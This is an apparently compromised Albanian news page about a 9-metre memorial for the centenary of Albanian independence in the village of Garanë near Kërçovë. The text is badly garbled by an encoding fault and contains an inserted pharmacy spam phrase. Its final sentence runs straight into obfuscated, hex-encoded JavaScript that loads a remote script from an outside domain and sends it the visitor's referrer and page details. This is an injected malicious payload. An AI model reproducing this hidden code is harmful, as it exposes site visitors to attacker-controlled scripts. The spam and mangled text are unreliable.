f.1109093000301_m

Lapidar me logon e 100 vjetorit nA� fshatin GaranA�

comprar viagra canada. PA�rgatitjet pA�r festA�n e 100 vjetorit te pavarA�sisA� sA� shtetit shqiptar po vA�rehen dukshA�m edhe nA� KA�rA�ovA� me rrethinA�. BanorA�t e fshatit GaranA� tA� komunA�s sA� OsllomesA�, kanA� marrA� iniciativA�n pA�r vendosjen e gurA�themelit tA� logos sA� 100 vjetorit tA� pavarA�sisA� sA� shtetit shqiptarA� nA� hapA�sirat qA�ndrore tA� fshatit. Kjo iniciativA� A�shtA� ndA�rmarrA� nga kryesia e BL tA� fshatit e cila ka gjetur pA�rkrahje tA� fuqishme nga banorA�t Garanas.

NismA�n pA�r realizimin e kA�tij projekti e pA�rkrahin edhe mA�rgimtaret e kA�tij vendbanimi, siA� A�shtA� shoqata humanitare a�?Garanaa�? nA� ZvicA�r dhe shoqata humanitare a�?Garanaa�? nA� AmerikA�. Po kA�shtu pA�rkrahje pA�r financimin e kA�tij lapidari kanA� dhA�nA� edhe disa firma private tA� cilat gravitojnA� nA� fshatin GaranA� tA� komunA�s sA� OsllomesA�.

SiA� potencoi kryetari i BL tA� fshatit GaranA� Ibraim KoA�a, ky lapidar, do tA� kA�tA� pA�rmasat e 9 metrave, e punuar e tA�ra me beton tA� bardhA�, ku do tA� vendoset logoja e 100 vjetorit tA� pavarA�sisA�. a�?Ky A�shtA� njA� projekt i bashkA�sisA� lokale i cili ndA�rtohet nA� prag tA� festA�s sA� 100 vjetorit tA� pavarA�sisA� me pA�rmasa qA� logoja tA� ketA� njA� pamje mahnitA�se dhe tA� duket madhA�shtore nA� prag tA� festA�s sA� madhe tA� pavarA�sisA�a�?, thotA� kryetari i BL tA� fshatit GaranA� Ibrahim KoA�a, raporton Zhurnal.

Kjo A�shtA� hera e dytA� qA� banorA�t dhe bashkA�sia lokale nA� fshatin GaranA� marrin kA�si lloj iniciative me karakter kombA�tar.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}